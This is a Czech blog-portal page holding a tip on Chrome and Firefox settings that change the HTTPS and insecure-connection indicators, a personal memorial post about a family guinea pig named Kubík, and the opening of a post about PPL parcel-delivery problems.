Nelíbí se vám text Secure a chtěli byste jen zámeček? Nebo si chcete vyzkoušet, jak se (ne)změní vaše chování, když neuvidíte vedle zámečku i název firmy, tedy když tzv. EV certifikáty nebudou mít žádné zvláštní označení? Zkuste různé volby v chrome://flags/#simplify-https-indicator.

Přijde vám https:// v adresním řádku zbytečné? A co to www? Zapnutím chrome://flags/#omnibox-ui-hide-steady-state-url-scheme-and-subdomains to můžete skrýt. Tohle nastavení na Macu vyžaduje mít zapnuté MacViews, to prý uděláte pomocí chrome://flags/#secondary-ui-md.

Podobná nastavení najdete i ve Firefoxu v about:config: přeškrtnutý zámeček pro všechny stránky na HTTP nastavíte pomocí security.insecure_connection_icon.enabled (a pomocí security.insecure_connection_icon.pbmode.enabled jen pro privátní okno), nápis Not Secure pro takové stránky pak povolíte zapnutím security.insecure_connection_text.enabled (Not Secure jen v privátním okně zapnete pomocí security.insecure_connection_text.pbmode.enabled).

Pamatujte, že tato nastavení se mohou změnit nebo mohou být zcela odstraněna bez předchozího varování.

Morče Kubík

červenec
24
Petr Stehlík
Na jaře 2012 jsme Ráďovi dali k narozeninám morče. Pojmenovali jsme ho Kuba, Kubík. Byl moc krásně barevný a mazlivý.

Od jara do podzimu bydlel "na letním bytě" venku, aby byl na čerstvém vzduchu, dostával čerstvou trávu a další zeleninu. Celý den poslouchal ptáčky, v noci si sám spal v boudě, ráno už stával na verandě a čekal na nás. Když měl na něco hlad nebo chuť, přivolal nás svým typickým pískáním. Na zrní, které mu v granulích nechutnalo, za ním chodila myška.

Moc rád jedl seno, ale jen a pouze "z Železných hor". V prodejně věcí pro zvířátka už mě znali, vždycky jsem trval na tom, že chci z Železných hor, že to Kuba pozná a jiné jíst nechce. Mlsoň! :)

Jen v zimě jsme si ho brávali domů, aby nám nezmrzl. To pak bydlel s námi v kuchyni v kleci, spával v převrácené krabici od mlék, kam si vždycky zaběhl schovat se před námi, když dostal nějaký mls - nejraději měl mrkev. Věděl moc dobře, že mrkev bydlí v ledničce a tak vždycky moc kvíkal, jen když slyšel otevření jejích dveří. Za dobroty uměl taky moc pěkně poděkovat, takovým zvláštním zavrkotáním. Naopak pokud ho něco zlobilo, třeba pronikavé cinkavé zvuky, dával nám to vědět cvakáním zubama. Myslím, že jsme mu docela dobře rozuměli.


Jak se brzy ukázalo, rozuměl i on nám. Slyšel na své jméno, na zavolání přišel, věděl taky, co znamená "mrkvička" nebo "celer". Aby na nás nebyl v létě tak závislý, postavil jsem mu venkovní výběh a propojil ho potrubím s jeho verandou. Poprvé se dlouho bál do trubky vejít. Ale nakonec sebral odvahu a s typickým škrabkáním drápků v trubce proběhl až na konec, kde na něj čekala šťavnatá travička. Pak už si to pamatoval a chodil si sem-tam jak se mu zachtělo.


Tak to nějakou dobu šlo, ale nakonec jedno sušší léto už v dosahu trubky nebyla žádná čerstvá tráva a tak nemohl sám chodit na pastvu. Tehdy jsme se odhodlali k revolučnímu kroku a pustili jsme Kubíka na volno z domečku na zahradu. Věřili jsme, že jestli se má u nás dobře, neuteče, ale navečer se sám vrátí do svého příbytku. A Kubík to (na rozdíl od svých předchůdců) skutečně dokázal!


Celý den si hopkal šťastný po zahradě, tam si zobl ostřice, tam si ohryzal nějakou větvičku, tu ukousl list pampelišky, a pak si zaběhl pod boudu, kde měl v létě vždycky chládek, takže mohl odpočívat vleže na bříšku. Byl svobodný a bydlel s námi dobrovolně, snad i rád. Měli jsme z něj obrovkou radost.

Potrubí měl celý den otevřené, takže napít nebo na něco dobrého na zub si chodil na verandu, někdy jen tak ležel na zápraží, v horku většinou vycházel ven až s večerem. S chutí taky lehával na verandě a hlavu měl přitom vraženou v trubce, jako by tam měl průvan nebo nějaký klid, nevím.


Roky ubíhaly, Kubík nemládl. Byl i dvakrát u paní doktorky, dostal nějakou injekci proti parazitům, ale jinak to byl zdravý pašák. Až před rokem se mu naráz zakalily oči takovým mléčným zákalem. Paní doktorka vyřkla obávaný ortel - Kuba přestal vidět. Navrhla zkrátit mu život injekcí, ale my jsme si ho odvezli domů. S obavou jsme čekali na konec zimy - jak si sám na jaře poradí v boudě?


Ukázalo se, že náš Kubík nějakým zázračným způsobem dokázal fungoval i se zakaleným zrakem. Chodil si z boudy na zahradu a zpět, jako by se nechumelilo. Nechápu, jak to dělal, musel vidět jen nějaké stíny nebo možná ani to ne, ale přesto se dokázal orientovat a žít dál. Byl to opravdový bojovník.

Když jsem mu dnes v poledne nesl oběd, našel jsem ho, jak netypicky leží a spí na sluníčku. To přece nemá rád? Pohladil jsem ho a domlouval jsem mu, že má na verandě na misce celer, ať si na něj zajde. Tak vstal a zaběhl do trubky. Odpoledne jsem ho ale uviděl zase ležet venku, tentokrát ve stínu velkého keře. Přišel jsem za ním a uviděl, že už nedýchá...


Dožil se šesti a půl roku. Na morče asi slušný výkon. Poslední dobou to musel mít bez zraku moc těžké, ale nevzdal to a žil, dokud to jen šlo. Byl členem naší rodiny a bude nám chybět. Místo svého posledního odpočinku si pod velkým rozkvetlým keřem vybral sám, tak jsem jeho volbu respektoval. Teď tam leží pod zemí a nad sebou má křížek se jménem a datumy, kdy k nám přišel a kdy od nás odešel.

Chtěl jsem o něm napsat, protože bych nerad zapomněl, jak byl výjimečný. O morčatech se říká, že mají paměť jen 3 týdny. Náš Kubík si pamatoval trubku k výběhu od podzimu do jara. Taky se o nich říká, že nesmějí navlhnout. Náš Kubík si rád chodil v dešti ven, sekal si travičku a voda mu vůbec nevadila. To, že rozuměl, co mu říkám, už jsem psal. Chápal celé věty typu "Kubíku, přinesl jsem ti mrkvičku, je na verandě v misce, vlastně ne, dal jsem ji za misku".

Na podzim, když jsme ho stěhovali do domu, tak jsme s úžasem zjistili, že dokázal natrhat krabici od mlék na malé kousíčky a pečlivě ucpat všechny škvíry ve svém dřevěném domečku, aby mu tam netáhlo. A když jsme mu dali nějaké staré hadry do domečku a v legraci řekli, aby se jimi přikryl, tak jsme pak překvapeně zjistili, že si z nich udělal krásné hnízdečko a navrch se přikryl pečlivě okousanou krabicí od mlék, aby byl jako v nějakém úzkém zatepleném tunelu. Byl to opravdový šikula!

Zahrál si taky v mém zatím nejsledovanějším filmu na Youtube, kdy jsem testoval NoIR kameru k Raspberry Pi a automatické nahrávání po detekci pohybu:


Byl naše tuším druhé nebo třetí morče, ale byl naprosto výjimečný svou samostatností, inteligencí a dlouhověkostí. Budeme na něj s láskou vzpomínat...

Problémy s PPL – nedoručují balíky

červenec
23
Franta Kučera

Sice to moc nesouvisí s tématem portálu, ale předpokládám, že hodně z vás nakupuje na internetu, takže vám snad tahle informace bude k užitku.